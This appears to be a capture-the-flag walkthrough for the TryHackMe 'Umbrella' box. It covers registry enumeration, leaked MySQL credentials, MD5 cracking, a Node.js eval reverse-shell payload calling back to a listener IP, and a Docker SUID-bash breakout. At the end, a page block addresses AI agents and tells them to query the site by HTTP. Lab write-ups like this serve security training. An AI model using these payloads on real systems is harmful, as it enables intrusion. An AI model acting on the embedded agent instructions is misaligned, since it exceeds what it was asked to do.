# Umbrella **Room Link:** ## **Scans** Initial scan **Kali** ``` nmap -A $VICTIM ```

Longer scan **Kali** ``` nmap -sV -sT -O -p 1-65535 $VICTIM ```

## **TCP/5000 - Docker Registry** **List repositories** **Kali** ``` curl -s http://$VICTIM:5000/v2/_catalog ```

**Get tags of a repository** **Kali** ``` curl -s http://$VICTIM:5000/v2/umbrella/timetracking/tags/list ```

**Get manifests** Inside the manifest we find potential credentials **Kali** ``` curl -s http://$VICTIM:5000/v2/umbrella/timetracking/manifests/latest ```

## **TCP/3306 - MySQL** **Kali** ``` apt install mysql-client-core-5.7 mysql -h $VICTIM -u root -p'Ng1-f3!Pe7-e5?Nf3xe5' ``` **Kali(mysql)** ``` show databases; use timetracking; show tables; select * from users; ```

**Kali** ``` wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py python3 hash-id.py 2ac9cb7dc02b3c0083eb70898e549b63 ```

**hash.txt** ``` claire-r:2ac9cb7dc02b3c0083eb70898e549b63 chris-r:0d107d09f5bbe40cade3de5c71e9e9b7 jill-v:d5c0607301ad5d5c1528962a83992ac8 barry-b:4a04890400b5d7bac101baace5d7e994 ``` **Kali** ``` john --format=raw-md5 hash.txt john --format=raw-md5 hash.txt --show ```

**output** ``` claire-r:Password1 chris-r:letmein jill-v:sunshine1 ``` ## **TCP/22 - SSH** **Kali** ``` ssh claire-r@$VICTIM Password: Password1 ```

## Privilege Escalation In Claire's home directory we see the files that host the website. We can see the timeCalc uses the eval statement which is vulnerable. **Victim** ``` cd /home/claire-r/timeTracker-src cat app.js ```

### **TCP/80:443 - HTTP(s)** **Kali** ``` nc -lvnp 1337 ``` **Login** ``` Username: claire-r Password:Password1 ```

**Payload** ``` (function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("sh", []); var client = new net.Socket(); client.connect(1337, "10.10.245.149", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; // Prevents the Node.js application from crashing })(); ```

Full TTY Shell ``` script -qc /bin/bash /dev/null ctrl + Z stty raw -echo;fg ```

## Docker Breakout **Exploit:** ### Privilege Escalation with 2 shells and host mount If you have access as **root inside a container** that has some folder from the host mounted and you have **escaped as a non privileged user to the host** and have read access over the mounted folder. You can create a **bash suid file** in the **mounted folder** inside the **container** and **execute it from the host** to privesc. **Victim(root)** ``` find / -name "tt.log" cd /logs cp /bin/bash . chown root:root bash chmod 4777 bash ``` **Victim(claire-r)** ``` find / -name "tt.log" cd /home/claire-r/timeTracker-src/logs ./bash -p ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/umbrella.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.